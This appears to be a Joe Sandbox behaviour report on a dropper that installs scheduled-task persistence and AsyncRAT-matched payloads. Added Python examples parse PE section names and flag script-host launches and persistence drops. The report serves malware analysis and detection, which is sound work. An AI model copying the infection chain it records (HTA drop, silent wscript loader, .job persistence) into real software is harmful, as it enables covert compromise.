Source: QkRFz2sau5.exe, 00000000.00000002.22057112305.0000000000A22000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer
Source: QkRFz2sau5.exe | String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer
Source: C:\Users\user\Desktop\QkRFz2sau5.exe | File created: C:\Users\user\AppData\Local\Temp\CB6Ixkrbm.hta
Source: Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE.6.dr | Static PE information: section name:
Source: Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE.6.dr | Static PE information: section name: .idata
Source: Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE.6.dr | Static PE information: section name:
Source: skotes.exe.11.dr | Static PE information: section name:
Source: skotes.exe.11.dr | Static PE information: section name: .idata
Source: skotes.exe.11.dr | Static PE information: section name:
Source: random[1].exe0.14.dr | Static PE information: section name:
Source: random[1].exe0.14.dr | Static PE information: section name: .idata
Source: random[1].exe0.14.dr | Static PE information: section name:
Source: 9c1024a1f1.exe.14.dr | Static PE information: section name:
Source: 9c1024a1f1.exe.14.dr | Static PE information: section name: .idata
Source: 9c1024a1f1.exe.14.dr | Static PE information: section name:
Source: random[1].exe1.14.dr | Static PE information: section name:
Source: random[1].exe1.14.dr | Static PE information: section name: .idata
Source: random[1].exe1.14.dr | Static PE information: section name:
Source: 935372fb1f.exe.14.dr | Static PE information: section name:
Source: 935372fb1f.exe.14.dr | Static PE information: section name: .idata
Source: 935372fb1f.exe.14.dr | Static PE information: section name:
Source: random[2].exe2.14.dr | Static PE information: section name:
Source: random[2].exe2.14.dr | Static PE information: section name: .idata
Source: random[2].exe2.14.dr | Static PE information: section name:
Source: c7f37422c5.exe.14.dr | Static PE information: section name:
Source: c7f37422c5.exe.14.dr | Static PE information: section name: .idata
Source: c7f37422c5.exe.14.dr | Static PE information: section name:
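Every dropped executable above is listed with two sections whose names render blank around a normal `.idata` section: this is the "PE file contains section with special chars" signature, where the 8-byte Name field holds NUL bytes or non-printable characters instead of a label such as `.text`. The following is an added example, not Joe Sandbox's check: a stdlib-only parser that walks the COFF section table and classifies each Name field, run against a header-only PE stub constructed for the demonstration (it has no optional header, which the parser tolerates because it skips that header by its declared size).

```python
"""Enumerate PE section names and flag empty or non-printable ones.

Added example, stdlib only; it is not Joe Sandbox's own check. build_stub_pe()
constructs a header-only image purely to exercise the parser.
"""
import struct
import sys

E_LFANEW_OFFSET = 0x3C       # DOS header field pointing at "PE\0\0"
COFF_HEADER_SIZE = 20
SECTION_HEADER_SIZE = 40
SECTION_NAME_SIZE = 8


def pe_section_names(data: bytes):
    """Return the raw 8-byte Name field of every section header, in order."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, E_LFANEW_OFFSET)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("PE signature not found at e_lfanew")
    coff = e_lfanew + 4
    # COFF header layout: Machine(2) NumberOfSections(2) TimeDateStamp(4)
    # PointerToSymbolTable(4) NumberOfSymbols(4) SizeOfOptionalHeader(2) Characteristics(2)
    n_sections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    table = coff + COFF_HEADER_SIZE + opt_size
    names = []
    for i in range(n_sections):
        off = table + i * SECTION_HEADER_SIZE
        raw = data[off:off + SECTION_NAME_SIZE]
        if len(raw) < SECTION_NAME_SIZE:
            raise ValueError(f"section table truncated at entry {i}")
        names.append(raw)
    return names


def classify_section_name(raw: bytes) -> str:
    """'empty', 'non-printable' or 'printable' for one 8-byte Name field."""
    name = raw.rstrip(b"\x00")
    if not name:
        return "empty"
    # Anything outside printable 7-bit ASCII (an embedded NUL, a space, high
    # bytes) is what the sandbox reports as a section with special chars.
    if any(b < 0x21 or b > 0x7E for b in name):
        return "non-printable"
    return "printable"


def suspicious_sections(data: bytes):
    """Return (index, raw_name, verdict) for every section that is not printable."""
    out = []
    for i, raw in enumerate(pe_section_names(data)):
        verdict = classify_section_name(raw)
        if verdict != "printable":
            out.append((i, raw, verdict))
    return out


def build_stub_pe(section_names):
    """Construct a minimal header-only PE image with the given section names."""
    dos = b"MZ" + b"\x00" * (E_LFANEW_OFFSET - 2) + struct.pack("<I", 0x40)
    coff = struct.pack("<HHIIIHH", 0x14C, len(section_names), 0, 0, 0, 0, 0x0102)
    table = b"".join(
        name.ljust(SECTION_NAME_SIZE, b"\x00")[:SECTION_NAME_SIZE]
        + b"\x00" * (SECTION_HEADER_SIZE - SECTION_NAME_SIZE)
        for name in section_names
    )
    return dos + b"PE\x00\x00" + coff + table


# Constructed sample mirroring the pattern in the report: a normal .text, a
# name that is all NUL bytes, a normal .idata, and a name made of high bytes.
SAMPLE_PE = build_stub_pe([b".text", b"", b".idata", b"\x90\xa5\x8c"])

if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_PE
    for i, raw in enumerate(pe_section_names(data)):
        print(f"[{i}] {raw!r:28} {classify_section_name(raw)}")
```

Run it against any of the `.dr` files from the report to see the actual bytes behind the blank names; the `repr` output makes NULs and high bytes visible where the HTML rendering drops them.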
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE
Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object | HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process Stats: CPU usage > 6%
Source: C:\Users\user\Desktop\QkRFz2sau5.exe | Code function: 0_2_009CD5EB: CreateFileW, DeviceIoControl, CloseHandle
Source: C:\Users\user\Desktop\QkRFz2sau5.exe | Code function: 0_2_009C1201: LogonUserW, DuplicateTokenEx, CloseHandle, OpenWindowStationW, GetProcessWindowStation, SetProcessWindowStation, OpenDesktopW, LoadUserProfileW, CreateEnvironmentBlock, CreateProcessAsUserW, UnloadUserProfile, GetProcessHeap, HeapFree, CloseWindowStation, CloseDesktop, SetProcessWindowStation, CloseHandle, DestroyEnvironmentBlock
Source: C:\Users\user\Desktop\QkRFz2sau5.exe | Code function: 0_2_009CE8F6: ExitWindowsEx, InitiateSystemShutdownExW, SetSystemPowerState
Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE | File created: C:\Windows\Tasks\skotes.job
Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exe | File created: C:\Windows\SchedulesAb
Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exe | File created: C:\Windows\ContainsBefore
Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exe | File created: C:\Windows\TokenDetroit
Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exe | File created: C:\Windows\AttacksContacted
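The entries above (an `.hta` dropped to Temp, PowerShell writing an `.EXE` under AppData, `wscript.exe` started with `//B` on a script under AppData, a `.job` written to `C:\Windows\Tasks`, extension-less files created directly under `C:\Windows`) are the kind of behaviour a triage script can pick out of a sandbox log without a human reading every line. The following is an added example and not Joe Sandbox's own logic: its input lines are constructed in the shape of the report's "Process created" and "File created" entries, and the rule set and path list are assumptions for illustration, not a complete detection.

```python
"""Flag script-host launches and persistence drops in sandbox behaviour lines.

Added example; not Joe Sandbox's own logic. Input lines are constructed in the
shape "Source: <src> | <Event>: <value>". Rules and path lists are assumptions.
"""
import re
from pathlib import PureWindowsPath

PROC_RE = re.compile(r"^Source: (?P<src>.+?) \| Process created: (?P<image>\S+) (?P<cmdline>.+)$")
FILE_RE = re.compile(r"^Source: (?P<src>.+?) \| File created: (?P<path>.+)$")

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\programdata\\")
# Directories under C:\Windows where a user-level dropper legitimately writes.
WINDOWS_ALLOWED = ("c:\\windows\\tasks\\", "c:\\windows\\temp\\")


def _user_writable(p: str) -> bool:
    return any(marker in p.lower() for marker in USER_WRITABLE)


def analyse_line(line: str):
    """Return a list of finding strings for one behaviour line (empty if benign)."""
    findings = []
    m = PROC_RE.match(line)
    if m:
        image = PureWindowsPath(m["image"]).name.lower()
        cmd = m["cmdline"]
        if image in SCRIPT_HOSTS and _user_writable(cmd):
            findings.append(f"{image} running content from a user-writable path")
        if image == "wscript.exe" and re.search(r"(?i)//b\b", cmd):
            findings.append("wscript.exe //B: batch mode, script errors are suppressed")
        if image == "werfault.exe":
            findings.append(f"crash handler started for {m['src']}")
        return findings
    m = FILE_RE.match(line)
    if m:
        src = PureWindowsPath(m["src"]).name.lower()
        path = m["path"]
        low = path.lower()
        if low.startswith("c:\\windows\\tasks\\") and low.endswith(".job"):
            findings.append("legacy scheduled-task .job file written to C:\\Windows\\Tasks")
        if src == "powershell.exe" and low.endswith(".exe") and _user_writable(low):
            findings.append("PowerShell wrote an executable into a user-writable path")
        if low.endswith(".hta"):
            findings.append("HTA dropped (mshta launch target)")
        if (low.startswith("c:\\windows\\") and not low.startswith(WINDOWS_ALLOWED)
                and "." not in PureWindowsPath(path).name):
            findings.append("extension-less file written directly under C:\\Windows")
    return findings


def analyse(lines):
    """Map each flagged line to its findings; benign lines are omitted."""
    return {ln: f for ln in lines if (f := analyse_line(ln))}


# Constructed sample lines modelled on the report's entries (dropper name for
# the PowerShell write is made up).
SAMPLE_LINES = [
    r"Source: C:\Users\user\Desktop\QkRFz2sau5.exe | File created: C:\Users\user\AppData\Local\Temp\CB6Ixkrbm.hta",
    r"Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\dropped.EXE",
    r'Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js"',
    r"Source: C:\Users\user\AppData\Local\Temp\dropped.EXE | File created: C:\Windows\Tasks\skotes.job",
    r"Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exe | File created: C:\Windows\TokenDetroit",
    r"Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\notepad.exe notepad.exe C:\Users\user\Desktop\notes.txt",
]

if __name__ == "__main__":
    for line, findings in analyse(SAMPLE_LINES).items():
        print(line)
        for f in findings:
            print("   ->", f)
```

The `//B` check matters more than it looks: batch mode silences the script-error dialogs that would otherwise alert a user when a dropped `.js` loader fails half-way, which is why loaders are almost always launched that way.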
Source: C:\Users\user\Desktop\QkRFz2sau5.exe | Code function: 0_2_009D2046
Source: C:\Users\user\Desktop\QkRFz2sau5.exe | Code function: 0_2_00968060
Source: C:\Users\user\Desktop\QkRFz2sau5.exe | Code function: 0_2_009C8298
Source: C:\Users\user\Desktop\QkRFz2sau5.exe | Code function: 0_2_0099E4FF
Source: C:\Users\user\Desktop\QkRFz2sau5.exe | Code function: 0_2_0099676B
Source: C:\Users\user\Desktop\QkRFz2sau5.exe | Code function: 0_2_0098CAA0
Source: C:\Users\user\Desktop\QkRFz2sau5.exe | Code function: 0_2_0096CAF0
Source: C:\Users\user\Desktop\QkRFz2sau5.exe | Code function: 0_2_0097CC39
Source: C:\Users\user\Desktop\QkRFz2sau5.exe | Code function: 0_2_00996DD9
Source: C:\Users\user\Desktop\QkRFz2sau5.exe | Code function: 0_2_009691C0
Source: C:\Users\user\Desktop\QkRFz2sau5.exe | Code function: 0_2_0097B119
Source: C:\Users\user\Desktop\QkRFz2sau5.exe | Code function: 0_2_00981394
Source: C:\Users\user\Desktop\QkRFz2sau5.exe | Code function: 0_2_00981706
Source: C:\Users\user\Desktop\QkRFz2sau5.exe | Code function: 0_2_0098781B
Source: C:\Users\user\Desktop\QkRFz2sau5.exe | Code function: 0_2_009819B0
Source: C:\Users\user\Desktop\QkRFz2sau5.exe | Code function: 0_2_0097997D
Source: C:\Users\user\Desktop\QkRFz2sau5.exe | Code function: 0_2_00967A15
Source: C:\Users\user\Desktop\QkRFz2sau5.exe | Code function: 0_2_00987A4A
Source: C:\Users\user\Desktop\QkRFz2sau5.exe | Code function: 0_2_00987CA7
Source: C:\Users\user\Desktop\QkRFz2sau5.exe | Code function: 0_2_00981C77
Source: C:\Users\user\Desktop\QkRFz2sau5.exe | Code function: 0_2_00999EEE
Source: C:\Users\user\Desktop\QkRFz2sau5.exe | Code function: 0_2_009EBE44
Source: C:\Users\user\Desktop\QkRFz2sau5.exe | Code function: 0_2_00981F32
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 14_2_00718860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 14_2_00717049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 14_2_007178BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 14_2_00712D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 14_2_006D4DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 14_2_007131A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 14_2_00707F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 14_2_006D4B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 14_2_0071779B
Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exe | Code function: 15_3_00B8B028
Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exe | Code function: 15_3_00B947BC
Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exe | Code function: 15_3_00BA15E0
Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exe | Code function: 15_3_059D5CC4
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
Source: C:\Users\user\Desktop\QkRFz2sau5.exe | Code function: String function: 00980A30 appears 46 times
Source: C:\Users\user\Desktop\QkRFz2sau5.exe | Code function: String function: 0097F9F2 appears 40 times
Source: C:\Users\user\Desktop\QkRFz2sau5.exe | Code function: String function: 00969CB3 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6064 -s 936
Source: QkRFz2sau5.exe, 00000000.00000003.22054479480.0000000001440000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: FV_ORIGINALFILENAME vs QkRFz2sau5.exe
Source: QkRFz2sau5.exe, 00000000.00000003.22054479480.0000000001440000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename vs QkRFz2sau5.exe
Source: QkRFz2sau5.exe, 00000000.00000003.22054245248.0000000001440000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: FV_ORIGINALFILENAME vs QkRFz2sau5.exe
Source: QkRFz2sau5.exe, 00000000.00000003.22054245248.0000000001440000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename vs QkRFz2sau5.exe
Source: QkRFz2sau5.exe, 00000000.00000003.22056276089.0000000001300000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: FV_ORIGINALFILENAME vs QkRFz2sau5.exe
Source: QkRFz2sau5.exe, 00000000.00000003.22055944034.0000000001300000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: FV_ORIGINALFILENAME vs QkRFz2sau5.exe
Source: QkRFz2sau5.exe, 00000000.00000003.22053985812.0000000001440000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: FV_ORIGINALFILENAME vs QkRFz2sau5.exe
Source: QkRFz2sau5.exe, 00000000.00000003.22053985812.0000000001440000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename vs QkRFz2sau5.exe
Source: QkRFz2sau5.exe, 00000000.00000003.22055788851.00000000012F3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: FV_ORIGINALFILENAME vs QkRFz2sau5.exe
Source: QkRFz2sau5.exe, 00000000.00000003.22056516910.0000000001301000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: FV_ORIGINALFILENAME vs QkRFz2sau5.exe
Source: QkRFz2sau5.exe, 00000000.00000002.22058116055.0000000001307000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: FV_ORIGINALFILENAME vs QkRFz2sau5.exe
Source: QkRFz2sau5.exe, 00000000.00000003.22056586416.0000000001304000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: FV_ORIGINALFILENAME vs QkRFz2sau5.exe
Source: QkRFz2sau5.exe, 00000000.00000003.22056200630.0000000001440000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: FV_ORIGINALFILENAME vs QkRFz2sau5.exe
Source: QkRFz2sau5.exe, 00000000.00000003.22056200630.0000000001440000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename vs QkRFz2sau5.exe
Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: QkRFz2sau5.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: 29.3.Macromedia.com.4985ad0.0.unpack, type: UNPACKEDPE | Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 29.3.Macromedia.com.4985ad0.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 29.3.Macromedia.com.4985ad0.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 29.3.Macromedia.com.499e4c0.3.unpack, type: UNPACKEDPE | Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 29.3.Macromedia.com.499e4c0.3.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 29.3.Macromedia.com.499e4c0.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 29.3.Macromedia.com.499e4c0.2.unpack, type: UNPACKEDPE | Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 29.3.Macromedia.com.499e4c0.2.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                Source: 29.3.Macromedia.com.499e4c0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                                Source: 34.3.AchillesGuard.com.3c531d8.0.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
                                Source: 34.3.AchillesGuard.com.3c531d8.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                Source: 34.3.AchillesGuard.com.3c531d8.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                                Source: 29.3.Macromedia.com.4985ad0.0.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
                                Source: 29.3.Macromedia.com.4985ad0.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                Source: 29.3.Macromedia.com.4985ad0.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                                Source: 29.3.Macromedia.com.4985ad0.1.unpack, type: UNPACKEDPEMatched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
                                Source: 29.3.Macromedia.com.4985ad0.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                Source: 29.3.Macromedia.com.4985ad0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                                Source: 34.3.AchillesGuard.com.1388a80.4.unpack, type: UNPACKEDPEMatched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
                                Source: 34.3.AchillesGuard.com.1388a80.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                Source: 34.3.AchillesGuard.com.1388a80.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
